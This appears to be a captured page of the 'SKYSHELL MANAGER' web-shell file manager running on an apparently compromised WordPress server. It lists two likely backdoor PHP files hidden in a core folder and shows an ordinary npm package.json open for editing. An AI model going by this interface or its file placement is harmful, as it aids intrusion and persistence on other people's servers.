📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "_from": "pkg@^5.3.0", "_id": "pkg@5.5.2", "_inBundle": false, "_integrity": "sha512-pD0UB2ud01C6pVv2wpGsTYJrXI/bnvGRYvMLd44wFzA1p+A2jrlTGFPAYa7YEYzmitXhx23PqalaG1eUEnSwcA==", "_location": "/@budibase/cli/pkg", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "pkg@^5.3.0", "name": "pkg", "escapedName": "pkg", "rawSpec": "^5.3.0", "saveSpec": null, "fetchSpec": "^5.3.0" }, "_requiredBy": [ "/@budibase/cli" ], "_resolved": "https://registry.npmjs.org/pkg/-/pkg-5.5.2.tgz", "_shasum": "c21ca9b5cb48feceb3b158c17df855ada350086d", "_spec": "pkg@^5.3.0", "_where": "/usr/local/lib/node_modules/@budibase/cli", "bin": { "pkg": "lib-es5/bin.js" }, "bugs": { "url": "https://github.com/vercel/pkg/issues" }, "bundleDependencies": false, "dependencies": { "@babel/parser": "7.16.2", "@babel/types": "7.16.0", "chalk": "^4.1.2", "escodegen": "^2.0.0", "fs-extra": "^9.1.0", "globby": "^11.0.4", "into-stream": "^6.0.0", "minimist": "^1.2.5", "multistream": "^4.1.0", "pkg-fetch": "3.2.6", "prebuild-install": "6.1.4", "progress": "^2.0.3", "resolve": "^1.20.0", "stream-meter": "^1.0.4", "tslib": "2.3.1" }, "deprecated": false, "description": "Package your Node.js project into an executable", "devDependencies": { "@babel/core": "7.16.0", "@types/escodegen": "0.0.7", "@types/fs-extra": "9.0.13", "@types/minimist": "1.2.2", "@types/multistream": "2.1.1", "@types/node": "14.17.32", "@types/resolve": "1.20.1", "@types/stream-meter": "0.0.22", "@typescript-eslint/eslint-plugin": "4.33.0", "@typescript-eslint/parser": "4.33.0", "eslint": "7.32.0", "eslint-config-airbnb-base": "14.2.1", "eslint-config-airbnb-typescript": "12.3.1", "eslint-config-prettier": "8.3.0", "eslint-plugin-import": "2.25.2", "json-stable-stringify": "^1.0.1", "lint-staged": "^10.5.4", "mkdirp": "^1.0.4", "prettier": "2.4.1", "rimraf": "^3.0.2", "simple-git-hooks": ">=2.7.0", "typescript": "4.4.4" }, "files": [ "lib-es5/*.js", "dictionary/*.js", "prelude/*.js" ], "greenkeeper": { "emails": false, "ignore": [ "pkg-fetch" ] }, "homepage": "https://github.com/vercel/pkg#readme", "license": "MIT", "lint-staged": { "*.{js,css,md,json}": "prettier --write" }, "main": "lib-es5/index.js", "name": "pkg", "peerDependencies": { "node-notifier": ">=9.0.1" }, "peerDependenciesMeta": { "node-notifier": { "optional": true } }, "prettier": { "singleQuote": true }, "repository": { "type": "git", "url": "git+https://github.com/vercel/pkg.git" }, "scripts": { "build": "npm run clean && tsc", "clean": "rimraf lib-es5", "lint": "eslint lib prelude test", "lint:fix": "npm run lint -- --fix", "prepare": "npm run build", "prepublishOnly": "npm run lint", "start": "tsc --watch", "test": "npm run build && node test/test.js node14 no-npm && node test/test.js node12 no-npm && node test/test.js node10 no-npm && node test/test.js host only-npm" }, "simple-git-hooks": { "pre-commit": "npx lint-staged" }, "version": "5.5.2" }
Save